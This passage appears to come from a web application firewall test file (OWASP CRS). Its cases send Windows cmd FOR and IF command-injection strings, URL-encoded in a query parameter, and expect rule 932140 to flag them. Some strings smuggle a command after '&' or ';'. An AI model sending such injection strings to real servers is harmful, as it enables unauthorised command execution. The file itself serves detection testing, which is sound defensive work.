"/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 33 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25%7E+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 34 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25G%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 35 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25%25G%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 36 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25G%22%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 37 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25%25G%22%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 38 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25A+%25B+%25D" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 39 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25%25A+%25%25B+%25%25D" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 40 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25G%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 41 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25%25G%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 42 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+%25G+IN+%281%2C1%2C5%29+DO+echo+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 43 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+%25%25G+IN+%281%2C1%2C5%29+DO+echo+%25%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 44 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 45 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 46 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 47 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 48 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FD+%2Fr+%25G+in+%28%22User%2A%22%29+DO+Echo+We+found+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 49 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C3+delims%3D%2C%22+%25%25G+IN+%28weather.txt%29+DO+%40echo+%25%25G+%25%25H" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 50 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D4+delims%3D%2C%22+%25%25G+IN+%28%22deposit%2C%244500%2C123.4%2C12-AUG-09%22%29+DO+%40echo+Date+paid+%25%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 51 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 52 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%25%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 53 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 54 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 55 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 56 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 57 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+for+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2863%2B21%29%5C%22%27%29+do+%40set+%2Fp+%3D+PDVQIS%25iPDVQISPDVQIS%3C+nul" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 58 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%3Bfor+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2835%2B66%29%5C%22%27%29+do+%40set+%2Fp+%3D+LZEUZE%25iLZEUZELZEUZE%3C+nul%27" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 59 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%2Ff+%22tokens%3D%2A+delims%3D0%22+%25%25A+in+%28%22%25n1%25%22%29+do+set+%22n1%3D%25%25A%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 60 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D+%25i" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 61 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D%21LIST%21+%25i" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 62 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%2Fl+%25%25I+in+%280%2C1%2C5%29+do+call+echo+%25%25RANDOM%25%25" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 63 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25%25d+in+%28A%2CC%2CD%29+do+DIR+%25%25d+%2A.%2A" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 64 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25%25f+in+%28%2A.TXT+%2A.BAT+%2A.DOC%29+do+TYPE+%25%25f" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 65 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25%25P+in+%28%25PATH%25%29+do+if+exist+%25%25P%5C%2A.BAT+COPY+%25%25P%5C%2A.BAT+C%3A%5CBAT" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 66 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+filename.txt+++++%28" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 67 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+filename+++++++++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 68 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+filename+++++++++%28CMD%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 69 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+data.xls+++++++++Echo+The+file+was+found." + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 70 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+MyFile.txt+++++++%28ECHO+Some%5Bmore%5DPotatoes%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 71 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 72 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++%28CMD%29+ELSE+%28CMD%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 73 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 74 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+NOT+EXIST+C%3A%5Cnonexistent+++echo+hey" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 75 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+++%2FI+++NOT+++EXIST+++C%3A%5Cnonexistent+++echo+hey" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 76 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++%28CMD%29+ELSE+%28CMD%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 77 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+EXIST+%28C%3A%5Cnonexistent%29+ECHO+pwnt" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 78 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++DEFINED+variable+++++++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 79 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+DEFINED+_example+++++++ECHO+Value+Missing" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 80 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++ERRORLEVEL+0+++++++++++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 81 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+ERRORLEVEL+0+++++++++++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 82 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++CMDEXTVERSION+1++++++++GOTO+start_process" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 83 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++2++++++++++++GEQ+15++++echo+%22bigger%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 84 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%222%22++++++++++GEQ+%2215%22++echo+%22bigger%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 85 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+EQU+2+++++goto+sub_problem2" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 86 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+NEQ+0+++++echo+test" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 87 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+LEQ+2+++++echo+test" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 88 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GTR+2+++++echo+test" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 89 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GEQ+2+++++echo+test" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 90 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25VARIABLE%25+++GTR+0+++++Echo+An+error+was+found" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 91 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25VARIABLE%25+++LSS+0+++++Echo+An+error+was+found" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 92 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25VARIABLE%25+++EQU+0+++++Echo+An+error+was+found" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 93 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+++++item1%3D%3Ditem2+++++++++++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 94 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+NOT+item1%3D%3Ditem2+++++++++++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 95 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 